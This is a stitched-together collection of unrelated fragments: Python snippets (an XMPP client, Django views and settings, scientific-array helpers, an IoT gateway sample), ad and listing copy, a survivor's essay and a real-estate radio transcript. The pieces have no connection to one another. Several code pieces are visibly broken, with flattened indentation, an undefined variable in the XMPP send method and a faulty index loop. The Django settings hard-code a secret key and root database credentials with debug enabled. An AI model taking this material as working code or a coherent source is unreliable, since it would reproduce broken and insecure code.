        if result.get('error') is not None:
            print "Error #%s : %s" % (result.get('error'), result.get('data'))
            print "Hit rate limit. Waiting 5 seconds and trying again..."
            sleep(5)
            # Retry this request; recursing here would restart the counter and
            # send extra requests once the recursive call returned.
            continue
        print "Number of Requests: ", requests + 1
        print result.get('response')
        requests = requests + 1
        sleep(interval)
print "Sending Requests..."
SendRequests(url, req_per_minute)
|
This product has a FreakScore of 4.6 out of 10 based on 85 scores.
This product has a FreakScore of 4.6 out of 10 based on 188 scores.
This product has a FreakScore of 4.6 out of 10 based on 60 scores.
This product has a FreakScore of 4.6 out of 10 based on 46 scores.
This product has a FreakScore of 4.6 out of 10 based on 1491 scores.
This product has a FreakScore of 4.6 out of 10 based on 1774 scores.
This product has a FreakScore of 4.5 out of 10 based on 48 scores.
This product has a FreakScore of 4.5 out of 10 based on 778 scores.
This product has a FreakScore of 4.5 out of 10 based on 103 scores.
This product has a FreakScore of 4.5 out of 10 based on 286 scores.
This product has a FreakScore of 4.5 out of 10 based on 326 scores.
This product has a FreakScore of 4.5 out of 10 based on 81 scores.
This product has a FreakScore of 4.5 out of 10 based on 2025 scores.
This product has a FreakScore of 4.5 out of 10 based on 650 scores.
This product has a FreakScore of 4.5 out of 10 based on 28 scores.
This product has a FreakScore of 4.5 out of 10 based on 280 scores.
This product has a FreakScore of 4.5 out of 10 based on 267 scores.
This product has a FreakScore of 4.4 out of 10 based on 526 scores.
This product has a FreakScore of 4.4 out of 10 based on 48 scores.
This product has a FreakScore of 4.4 out of 10 based on 1748 scores.
This product has a FreakScore of 4.4 out of 10 based on 174 scores. |
# -*- coding: utf-8 -*-
##Copyright (C) [2009] [Jürgen Hamel, D-32584 Löhne]
##This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as
##published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version.
##This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
##warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
##for more details.
##You should have received a copy of the GNU General Public License along with this program; if not, write to the
##Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#from twisted.web import xmlrpc
import sys,os,string,threading,time,curses
from time import strftime
import xmlrpclib
from twisted.internet.protocol import Protocol
from twisted.words.protocols.jabber import client, jid, xmlstream
from twisted.words.xish import domish
from twisted.words.xish.domish import Element
from cuon.TypeDefs.constants import constants
import time
import shelve
class xmpp_client(constants):
def __init__(self, userjid, password):
constants.__init__(self)
self.filename = 'dic_jabberusers'
self.me = jid.JID(userjid)
self.juser = userjid
self.factory = client.basicClientFactory(self.me, password)
#self.Server = xmlrpclib.ServerProxy(self.XMLRPC_PROTO + '://' + self.XMLRPC_HOST + ':' + `self.XMLRPC_PORT`)
self.theXmlstream = None
self.dicUsers = {}
self.factory.addBootstrap('//event/stream/authd',self.authd)
# Authorized
def authd(self, xmlstream):
# need to send presence so clients know we're
# actually online.
print 'start authd'
presence = domish.Element(('jabber:client', 'presence'))
presence.addElement('status').addContent('Online')
self.theXmlstream = xmlstream
self.theXmlstream.send(presence)
self.theXmlstream.addObserver('/message', self.gotMessage)
print 'new xmlstream = ', self.theXmlstream
def create_reply(self, elem):
""" switch the 'to' and 'from' attributes to reply to this element """
# NOTE - see domish.Element class to view more methods
msg_frm = elem['from']
msg_to = elem['to']
message = domish.Element(('jabber:client','message'))
message["to"] = msg_frm
message["from"] = msg_to
message["type"] = "chat"
return message
    def buildProtocol(self, addr):
        # Unused factory hook; protocol instances are built by self.factory.
        print 'Connected.'
        return None
def send(self, to, body, subject=None, mtype=None, delay=None):
print 'start sending'
el = Element((None, "message"))
el.attributes["to"] = to
el.attributes["from"] = self.juser
el.attributes["id"] = '111111'
if(subject):
subj = el.addElement("subject")
subj.addContent(subject)
if(mtype):
el.attributes["type"] = mtype
if(delay):
x = el.addElement("x")
x.attributes["xmlns"] = "jabber:x:delay"
x.attributes["from"] = fro
x.attributes["stamp"] = delay
b = el.addElement("body")
b.addContent(body)
self.theXmlstream.send(el)
print 'done sending'
def gotMessage(self, message):
# sorry for the __str__(), makes unicode happy
print u"from1: %s" % message["from"]
send_from = message["from"].strip()
self.displayMessage(send_from, message)
    def displayMessage(self, send_from, message):
        # Minimal implementation (assumed behavior): print the sender and the
        # raw stanza received.
        print u"from: %s" % send_from
        print message.toXml()
def getTime(self):
return time.strftime(self.liTimes['hour24'],time.localtime())
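# Example usage (a minimal sketch; JID, password, host and port are placeholders):
#   from twisted.internet import reactor
#   c = xmpp_client('[email protected]/cuon', 'secret')
#   reactor.connectTCP('example.org', 5222, c.factory)
#   reactor.run()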
|
Get an alert with the newest ads for Clothing - 0-3 Months in Lloydminster.
0-3 month lot and 3-6 month lot. $60 takes it all (both lots). Most items are from Carter's; some were worn once, some not at all!
Post your classified or want ad in Lloydminster Clothing - 0-3 Months. It's fast and easy. |
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.template import Context, loader
from google.appengine.api import users
from userprefs.models import *
from clubs.models import Club
import logging
def index(request):
user = users.get_current_user()
club = None
phone = ""
if not user:
auth_url = users.create_login_url(request.path + '/prefs')
else:
auth_url = users.create_logout_url(request.path)
userPrefs = get_userprefs(user.user_id())
logging.info('userPrefs index: get_userprefs returns %s' % userPrefs)
if userPrefs:
logging.info('userPrefs: %s' % (userPrefs,))
club = userPrefs.club
phone = userPrefs.phone
else:
# should we ever get here? We should always get a userPref but version of prefs may be 0.
logging.info('userPrefs: no record yet. Why here??')
clubList = Club.objects.all().order_by('Number')
t = loader.get_template('userprefs/index.html')
c = RequestContext(request, {
'user': user,
'auth_url': auth_url,
'club': club,
'phone': phone,
'clubList' : clubList
})
return HttpResponse(t.render(c))
def update(request):
try:
user = users.get_current_user()
clubNumber = request.POST['clubNumber']
phoneNumber = request.POST['phoneNumber']
    except KeyError:
        # A required POST field was missing.
return render_to_response('prefs/index.html', {
'error_message': "Prefs update failed.",
}, context_instance=RequestContext(request))
else:
logging.info('Save UserPrefs: club=['+clubNumber+'], phoneNumber=['+phoneNumber+'], gid=['+user.user_id()+']')
newUserPrefs = UserPrefs(version=1,club=clubNumber,phone=phoneNumber,googleOpenId=user.user_id())
newUserPrefs.save()
# messages.success(request, 'Add')
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('userprefs.views.index'))
# return HttpResponse('Test') |
Big Cat Solutions has some of the most detailed reporting capabilities available to your organization. Our reporting gives our clients the ability to manage their purchases and set budgets. Our Customer Business Review offers an extremely professional analysis of our client’s purchases and our performance as their supplier.
By tailoring this report to meet our client’s needs, we look to bring value to your organization as a proactive partner.
Our experienced professionals can identify cost inefficiencies within your company’s purchasing habits. We can provide you with easy-to-read usage reports that individually break down what you purchase, in what quantity and at what price. We show your usage sorted by contract versus non-contract items, and we present the information in descending dollar order so that you can clearly see what percentage of your gross dollars goes to your most frequently purchased products.
Business Reviews also highlight critical performance measurements such as fill rate, backorders, and order size. These performance reviews enable you to monitor the service you are receiving from Big Cat Solutions and provide you with data to better manage your office products procurement process.
We work as consultants – using this type of information and our 30 years of experience to help your organization reduce the gross dollars spent, and help plan budgets for future procurement requirements. We work diligently as a true Business Partner because our future success is dependent on your future success. |
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
from isis_powder.hrpd_routines.hrpd_enums import HRPD_TOF_WINDOWS
absorption_correction_params = {
"cylinder_sample_height": 2.0,
"cylinder_sample_radius": 0.3,
"cylinder_position": [0., 0., 0.],
"chemical_formula": "V"
}
# Default cropping values are 5% off each end
window_10_50_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_10_110_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_30_130_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_100_200_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
window_180_280_params = {
"vanadium_tof_cropping": (0.05, 0.95),
"focused_cropping_values": (0.05, 0.95)
}
file_names = {
"vanadium_peaks_masking_file": "VanaPeaks.dat",
"grouping_file_name": "hrpd_new_072_01_corr.cal",
"nxs_filename": "{instlow}{runno}{_fileext}{suffix}.nxs",
"gss_filename": "{instlow}{runno}{_fileext}{suffix}.gss",
"dat_files_directory": "dat_files",
"tof_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_TOF.dat",
"dspacing_xye_filename": "{instlow}{runno}{_fileext}{suffix}_b{{bankno}}_D.dat",
}
general_params = {
"spline_coefficient": 70,
"focused_bin_widths": [
-0.0003, # Bank 1
-0.0007, # Bank 2
-0.0012 # Bank 3
],
"mode": "coupled"
}
def get_all_adv_variables(tof_window=HRPD_TOF_WINDOWS.window_10_110):
advanced_config_dict = {}
advanced_config_dict.update(file_names)
advanced_config_dict.update(general_params)
advanced_config_dict.update(get_tof_window_dict(tof_window=tof_window))
return advanced_config_dict
def get_tof_window_dict(tof_window):
if tof_window == HRPD_TOF_WINDOWS.window_10_50:
return window_10_50_params
if tof_window == HRPD_TOF_WINDOWS.window_10_110:
return window_10_110_params
if tof_window == HRPD_TOF_WINDOWS.window_30_130:
return window_30_130_params
if tof_window == HRPD_TOF_WINDOWS.window_100_200:
return window_100_200_params
if tof_window == HRPD_TOF_WINDOWS.window_180_280:
return window_180_280_params
raise RuntimeError("Invalid time-of-flight window: {}".format(tof_window))
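# Example (a minimal sketch):
#   adv = get_all_adv_variables(HRPD_TOF_WINDOWS.window_100_200)
#   adv["vanadium_tof_cropping"]  # -> (0.05, 0.95)
#   adv["spline_coefficient"]     # -> 70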
|
Sir, I have a plot measuring 18 x 70 feet, east facing. I'm an advocate, so I want to build a chamber and 3 rooms with 2 toilets.
You have a specific requirement, for which you should consult a designer for proper planning and a vastu expert (if required).
The total area is 18x70=1260 sq.ft.
I have attached an example of the layout drawing.
As you have a specific requirement, you can send the details of your site to [email protected]. We will then send a layout according to your requirements. |
import os
import numpy as np
import pandas as pd
from _config import SAMPLES_DIR, DF_ONE_IDX_SEVERAL_COL, DF_ONE_IDX_SEVERAL_COL_2, \
DF_ONE_IDX_ONE_COL, DF_ONE_IDX_TWO_COL, DF_TWO_IDX_ONE_COL, DF_SCATTER, \
DF_BUBBLE, DF_HEATMAP, DF_SEVERAL_IDX_ONE_COL
def load_df(src):
_dir = os.path.dirname(__file__)
df_file = os.path.join(_dir, SAMPLES_DIR, src)
df = pd.read_csv(df_file)
return df
def df_timeseries(N=3, Nb_bd=100, seed=123456):
np.random.seed(seed)
rate = 0.02
vol = 0.25
dt = 1.0/260
tracks = np.zeros([Nb_bd, N], dtype=np.float)
for k in range(N):
ln_returns = (rate-vol**2/2)*dt+vol*np.sqrt(dt)*np.random.normal(size=Nb_bd)
ln_returns[0] = 0.0
tracks[:, k] = np.exp(ln_returns).cumprod()
dates = pd.date_range(start=pd.datetime(2015, 1, 1), periods=Nb_bd, freq='B')
df = pd.DataFrame(data=tracks, index=dates, columns=['Track'+str(1+i) for i in range(N)])
return df
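# Example (a minimal sketch):
#   df = df_timeseries(N=2, Nb_bd=10)  # two simulated 10-business-day tracks
#   df.head()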
def df_one_idx_several_col():
df = load_df(DF_ONE_IDX_SEVERAL_COL)
df = df.set_index('Fruit')
return df
def df_one_idx_several_col_2():
df = load_df(DF_ONE_IDX_SEVERAL_COL_2)
df = df.set_index('WeekDay')
return df
def df_one_idx_one_col():
df = load_df(DF_ONE_IDX_ONE_COL)
df = df.set_index('Brand')
return df
def df_one_idx_two_col():
df = load_df(DF_ONE_IDX_TWO_COL)
df = df.set_index('Month')
return df
def df_two_idx_one_col():
df = load_df(DF_TWO_IDX_ONE_COL)
df = df.set_index(['Brand', 'Version'])
return df
def df_scatter():
df = load_df(DF_SCATTER)
df = df.set_index(['Height', 'Weight'])
return df
def df_bubble():
df = load_df(DF_BUBBLE)
df = df.set_index(['Cat', 'x', 'y'])
return df
def df_heatmap():
df = load_df(DF_HEATMAP)
df = df.set_index(['Name', 'Day'])
return df
def df_several_idx_one_col():
df = load_df(DF_SEVERAL_IDX_ONE_COL)
df = df.set_index(['Region', 'Country', 'Cause'])
df = df.sortlevel()
return df
|
Take on Easter Solitaire anytime and enjoy the exciting game play as you seek to finish the game. Enjoy this and many more free games on 8iz.com! Play our games on any device. |
import numpy
import afnumpy
import arrayfire
from .. import private_utils as pu
from ..decorators import *
def fromstring(string, dtype=float, count=-1, sep=''):
return array(numpy.fromstring(string, dtype, count, sep))
def array(object, dtype=None, copy=True, order=None, subok=False, ndmin=0):
# We're going to ignore this for now
# if(subok is not False):
# raise NotImplementedError
    if(order not in (None, 'K', 'C')):
raise NotImplementedError
# If it's not a numpy or afnumpy array first create a numpy array from it
if(not isinstance(object, afnumpy.ndarray) and
not isinstance(object, numpy.ndarray) and
not isinstance(object, arrayfire.array.Array)):
object = numpy.array(object, dtype=dtype, copy=copy, order=order, subok=subok, ndmin=ndmin)
if isinstance(object, arrayfire.array.Array):
shape = pu.c2f(object.dims())
else:
shape = object.shape
while(ndmin > len(shape)):
shape = (1,)+shape
if(dtype is None):
if isinstance(object, arrayfire.array.Array):
dtype = pu.typemap(object.dtype())
else:
dtype = object.dtype
if(isinstance(object, afnumpy.ndarray)):
if(copy):
s = arrayfire.cast(object.d_array.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object.d_array, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, arrayfire.array.Array)):
if(copy):
s = arrayfire.cast(object.copy(), pu.typemap(dtype))
else:
s = arrayfire.cast(object, pu.typemap(dtype))
a = afnumpy.ndarray(shape, dtype=dtype, af_array=s)
a._eval()
return a
elif(isinstance(object, numpy.ndarray)):
return afnumpy.ndarray(shape, dtype=dtype, buffer=numpy.ascontiguousarray(object.astype(dtype, copy=copy)))
else:
raise AssertionError
def arange(start, stop = None, step = None, dtype=None):
return afnumpy.array(numpy.arange(start,stop,step,dtype))
def empty(shape, dtype=float, order='C'):
return afnumpy.ndarray(shape, dtype=dtype, order=order)
def zeros(shape, dtype=float, order='C'):
b = numpy.zeros(shape, dtype, order)
return afnumpy.ndarray(b.shape, b.dtype, buffer=b,order=order)
def where(condition, x=pu.dummy, y=pu.dummy):
a = condition
s = arrayfire.where(a.d_array)
# numpy uses int64 while arrayfire uses uint32
s = afnumpy.ndarray(pu.af_shape(s), dtype=numpy.uint32, af_array=s).astype(numpy.int64)
# Looks like where goes through the JIT??
s.eval()
if(x is pu.dummy and y is pu.dummy):
idx = []
mult = 1
for i in a.shape[::-1]:
mult = i
idx = [s % mult] + idx
s //= mult
idx = tuple(idx)
return idx
elif(x is not pu.dummy and y is not pu.dummy):
if(x.dtype != y.dtype):
raise TypeError('x and y must have same dtype')
if(x.shape != y.shape):
raise ValueError('x and y must have same shape')
ret = afnumpy.array(y)
if(len(ret.shape) > 1):
ret = ret.flatten()
ret[s] = x.flatten()[s]
ret = ret.reshape(x.shape)
else:
ret[s] = x[s]
        return ret
else:
raise ValueError('either both or neither of x and y should be given')
def concatenate(arrays, axis=0):
arrays = tuple(arrays)
if len(arrays) == 0:
raise ValueError('need at least one array to concatenate')
base = arrays[0]
if len(arrays) == 1:
return base.copy()
# arrayfire accepts at most 4 arrays to concatenate at once so we'll have
# to chunk the arrays
# The first case is special as we don't want to create unnecessary copies
i = 0
a = arrays[i].d_array
if i+1 < len(arrays):
b = arrays[i+1].d_array
else:
b = None
if i+2 < len(arrays):
c = arrays[i+2].d_array
else:
c = None
if i+3 < len(arrays):
d = arrays[i+3].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
for i in range(4,len(arrays),4):
        a = ret  # ret is already a raw arrayfire array at this point
if i < len(arrays):
b = arrays[i].d_array
else:
b = None
if i+1 < len(arrays):
c = arrays[i+1].d_array
else:
c = None
if i+2 < len(arrays):
d = arrays[i+2].d_array
else:
d = None
ret = arrayfire.join(pu.c2f(arrays[0].shape, axis), a, b, c, d)
    # Wrap the raw arrayfire result back into an afnumpy ndarray.
    return afnumpy.ndarray(pu.af_shape(ret), dtype=base.dtype, af_array=ret)
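# Example usage (a minimal sketch):
#   a = afnumpy.array([1, 0, 2])
#   idx = where(a > 0)        # tuple of index arrays, numpy-style
#   b = concatenate((a, a))   # six-element afnumpy array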
|
In catchment for Great Berry School is this three bedroom detached family home, with an ensuite to the main bedroom and a large conservatory to the rear. The garage can be used as an office.
The property is fully centrally heated, powered by a Bosch combi boiler with radiators in all rooms, and is double glazed. The property also benefits from an installed alarm system.
Fitted units in white high gloss, with space for a fridge freezer and dishwasher. The central heating is powered by a wall-mounted Worcester combi boiler. Stainless steel one-and-a-half sink and drainer. With a gas hob and electric oven.
Beautifully decorated in modern colours and a large room with plenty of space for furniture. There is an ornate bay window to the front and a gas fire with surround along with two radiators.
Lantern style with plenty of windows allowing plenty of light overlooking the rear garden. French doors leading to the rear garden.
Convenient room with plumbing for washing machine and tumble dryer. Further storage.
Bath with shower over, W.C and wash hand basin.
The garage can be used for an office and has parking in front for two cars. |
# *****************************************************************************
# Copyright (c) 2016 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Amit M Mangalvedkar - Initial Contribution
# *****************************************************************************
import getopt
import time
import sys
import psutil
import platform
import json
import signal
import subprocess
from uuid import getnode as get_mac
try:
import ibmiotf.gateway
except ImportError:
# This part is only required to run the sample from within the samples
# directory when the module itself is not installed.
#
# If you have the module installed, just use "import ibmiotf"
import os
import inspect
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../../src")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import ibmiotf.gateway
def interruptHandler(signal, frame):
client.disconnect()
sys.exit(0)
def commandProcessor(cmd):
print("Command received: %s" % cmd.data)
if __name__ == "__main__":
signal.signal(signal.SIGINT, interruptHandler)
organization = "org_id"
gatewayType = "MY GATEWAY TYPE"
gatewayId = "MY GATEWAY ID"
gatewayName = platform.node()
authMethod = "token"
authToken = "MASKED PASSWORD"
configFilePath = None
# Seconds to sleep so as to check the error state
interval = 20
client = None
simpleGatewayInfo = ibmiotf.gateway.DeviceInfo()
simpleGatewayInfo.description = gatewayName
simpleGatewayInfo.deviceClass = platform.machine()
simpleGatewayInfo.manufacturer = platform.system()
simpleGatewayInfo.fwVersion = platform.version()
simpleGatewayInfo.hwVersion = None
simpleGatewayInfo.model = None
simpleGatewayInfo.serialNumber = None
options = {"org": organization, "type": gatewayType, "id": gatewayId, "auth-method": authMethod, "auth-token": authToken}
try:
        # By default the client is unmanaged, and on disconnecting it becomes
        # unmanaged again. That's why we need to make it a managed gateway.
client = ibmiotf.gateway.ManagedGateway(options, logHandlers=None, deviceInfo=simpleGatewayInfo)
client.commandCallback = commandProcessor
client.connect()
# manage() method sends request to DM server to make the device a managed device
client.manage(3600, supportDeviceActions=True, supportFirmwareActions=True).wait()
except ibmiotf.ConfigurationException as e:
print(str(e))
sys.exit()
except ibmiotf.UnsupportedAuthenticationMethod as e:
print(str(e))
sys.exit()
except ibmiotf.ConnectionException as e:
print(str(e))
sys.exit()
# Initiate DM action to update the geo location of the device, but don't wait (async) for it to complete
client.setLocation(longitude=85, latitude=85, accuracy=100)
print("Location has been set")
# Make a GET call to https://orgid.internetofthings.ibmcloud.com/api/v0002/device/types/{gateway type}/devices/{gateway id}/location to test
# Initiate DM action to set error codes to 1, wait for it to be completed (sync) and then clear all error codes
client.setErrorCode(1).wait(10)
print("Error code setting returned back")
time.sleep(interval)
client.clearErrorCodes()
client.disconnect()
print("(Press Ctrl+C to disconnect)")
|
It happens time and time again, a voice echoes loudly within our heads reminding us we are not like you and the outside world views us as different or difficult. There is no one course of action that a survivor “should take” or a specific way that a survivor “should act” during the recovery process. There are, however, some important things to keep in mind when offering support to a brain aneurysm/avm survivor.
1. THE RECOVERY PROCESS NEVER ENDS.
There will never come a time when I forget that an aneurysm entered my life. Telling me to “move on” or “get over it” never makes me want to embrace myself or the brain aneurysm. Recovery is a slow process and there are no vacations while I try to learn to navigate through this new life I’ve been given. I understand my aneurysm didn’t turn out to be a death sentence; instead, it has become a life sentence. The healing process will never end and it takes a long time before both the heart and mind are on the same track. Moving from healthy person to survivor has been a life-changing process; it has transformed how I view and accept the world. It scratched my lens of perception, landing me into a deeper sense of living.
2. SURVIVORS SHARE AN UNSPEAKABLE BOND.
In my 12 years of navigating the world as a brain aneurysm survivor, I am continually struck by the power of the bond between survivors. Our condition connects us and we become friends in mere seconds, even if we’ve never met before. No matter who we are, or how different we are, there is no greater bond than the connection between survivors. It’s a recovery journey for an entire lifetime, and unfortunately only those who have walked our path understand the depth of our pain and pride we carry at the same time. Being a survivor means I’m part of a club that I can never leave, one that is full of the most caring souls I’ve ever known.
3. I WILL BE A SURVIVOR FOR THE REST OF MY LIFE.
Period. The end. There is no “moving on,” or “getting over it.” I wish people could understand the day my rupture occurred was the day I started fighting for my life. My aneurysm was not a one time event….it was an event that will last a lifetime. I’ve become a member of the club called “brain aneurysm/avm survivors” and it’s a club I didn’t apply to join… nor one I can ever leave. Every single member wishes we’d met some other way, any other but this. The members are the most beautiful, caring, loving, compassionate people I’ve ever known. They are the ones changing the way the public views brain surgery and putting an exclamation point at the end of our awareness campaign.
4. NO MATTER HOW LONG IT’S BEEN, I STILL DESIRE MY OLD SELF BACK. I WILL GRIEVE A LIFETIME FOR HER.
There are great days and then there are the not-so-good days. Compassion, love, and understanding are what’s needed, not advice or a lecture on how I was so lucky to have survived. I miss the prior me and I realize there is no going back. There will never come a time when I won’t think about what I would be if the brain aneurysm hadn’t entered my life. It took me a long time to build that girl before the rupture and it may take me a lifetime to let her go. The length of grieving time over prior self is different for each of the club members, but every person will face a life-changing moment when they realize they can’t continue down the pathway of “prior self” and must take that fork in the road towards rebuilding.
5. THE CAUSE NEVER BECOMES LONELY.
Every day another person joins our club. Every day another survivor gets upset about how our cause is not known. They are the ones who spearhead awareness campaigns or launch a crusade of involvement. They do this in the hopes of saving another person from ever having to join our club. Curious about who the movers and shakers are in this cause? Look for the survivors who are turning their tragedy into a triumph. They’ve transformed their pain into a force to make a difference. They are the ones who have figured out that if they stop crying, they can be strong and create a movement.
6. BECAUSE I KNOW DEEP PAIN, I ALSO KNOW UNSPEAKABLE JOY.
Even though I may be in recovery for a lifetime, grieving my prior self doesn’t mean my life is void of happiness, love, and enjoyment. I don’t have to choose between grieving my prior self and happiness. In this situation, grieving and happiness can cohabitate. My life is more enriched now that I have experienced a brain aneurysm. I now think from a deeper place and love from a fuller heart. Because I’ve experienced pain, sorrow, and fear, my joy comes from a place of pureness and a sense of what is essential to live for.
"""
Django settings for project ers_backend.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ul2)0@*k-3snu(fijr8)9t1ozwuk3&4wmp_l=uikt426boodl@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# REST API
'rest_framework',
'rest_framework_swagger',
'corsheaders',
# Tests
'testing',
'model_mommy',
# Websockets
'swampdragon',
# Help
'annoying',
# Apps
'dataset_manager',
'video_processor',
'arousal_modeler',
'timeframe_annotator',
'emotion_annotator'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ers_backend.urls'
WSGI_APPLICATION = 'ers_backend.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'()': 'djangocolors_formatter.DjangoColorsFormatter',
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'()': 'djangocolors_formatter.DjangoColorsFormatter',
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'dataset_manager': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
},
'video_processor': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
},
'ers_backend': {
'handlers': ['console'],
'propagate': False,
'level': 'DEBUG',
}
}
}
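# For reference, the per-app loggers configured above are looked up by name
# with the standard library; minimal sketch of a hypothetical module inside
# the dataset_manager app:
#
#   import logging
#   logger = logging.getLogger('dataset_manager')  # key in LOGGING['loggers']
#   logger.debug('dataset scan started')  # rendered by the colored console handler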
# REST
CORS_ORIGIN_WHITELIST = (
    'http://localhost:3333',  # trailing comma keeps this a one-element tuple
)
CORS_ALLOW_HEADERS = (
'x-requested-with',
'content-type',
'accept',
'origin',
'authorization',
'X-CSRFToken'
)
CORS_ALLOW_CREDENTIALS = True
REST_FRAMEWORK = {
'UNICODE_JSON': False,
}
# Swampdragon
SWAMP_DRAGON_CONNECTION = ('swampdragon.connections.sockjs_connection.DjangoSubscriberConnection', '/data')
DRAGON_URL = 'http://localhost:9999/'
# Celery
USE_CELERY = True
BROKER_URL = 'redis://localhost:6379/1'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'ers_backend_db',
'USER': 'root',
'PASSWORD': 'root',
'HOST': '', # If mamp under OS X: /Applications/MAMP/tmp/mysql/mysql.sock
'PORT': '',
}
}
# Modify PATH if under OS X to have access to libraries such as ffmpeg
#os.environ["PATH"] += os.pathsep + os.pathsep.join(["/opt/local/bin", "/usr/local/bin"])
# Constants
VIDEO_EXTENSIONS = ("avi", "mkv", "mov", "mp4", "m4v", "mpeg", "mpg", "wmv")
DATASET_DEFAULT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'datasets'))
WEBCLIENT_VIDEOS_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'ers_frontend/_public/datasets/$datasetId$/videos'))
The latest real estate radio show talking about the Santa Clarita real estate market this week – February 4th, 2019. Enjoy the show; I have placed the ‘rough’ transcription below.
REMAX gateway: 00:00 Good everybody. Let’s get into the local real estate market here in just a moment. We’ll talk about what’s going on, the happenings and what you should be looking for if you’re considering buying or selling here as we get into the week of February, fourth, 2019. I’m your host, Conor MacIvor, Connor with honor local real estate agent headquartered here in the Santa Clarita Valley, serving greater Los Angeles cities. We do have access points for all of the multiple listing services here in southern California, and that’s going to be SCVnest.com. So if you are searching online for homes and real estate, make sure that you check out our site and I will tell you it took a lot to get it up and running just for the simple reason. Unlike Zillow and Trulia, I’m the real thing. I am a real live realtor and I have. There’s a checks and balances. There are rules and regulations for me to publicize the real listings.
REMAX gateway: 00:59 They have a workaround method sometimes. I know we get a lot of calls from clients. How about this property have at that property and I have to tell him the other day that probably is not even for sale, but I found it on Zillow. I said, I know. I know you did, but it’s not for sale. It just looks like it is. Lots of that going on. You want to escape all that and just look at real stuff. ScvNest Dot Com. Besides, I don’t want to sell your stuff. I want to be your realtor. I want to be your go-to agent, so if you do go to Scvnest.com. Do some searching. Eventually it’s going to ask you to save your listings and set you up on a search by of course, your parameters before you can proceed. The person that sees your personal information is me.
remax gateway: 01:48 That’s it. I don’t trade it. I don’t sell it, I don’t send it. I don’t compromise it in any way. It stays within my SSL encrypted database. That’s it. So when you’re ready, then you say, hey Connor, I’m all set. Let’s give it a start and the start will be, we’ll do the crash course on real estate. I’ll explain to you how it all works, whether you’re buying or selling, even if you’ve done it before, how the market’s changed, and then we’ll get into the rest of the people in those questions that you should be asking those people, those service providers regarding real estate and what they’re going to do for you to make sure that you’re well covered and those questions are going to also involve asking for the best deal you could possibly get. Why not? You should get that deal. In fact, anybody you go to that’s a professional service provider should always do their best service and handle you with the utmost care.
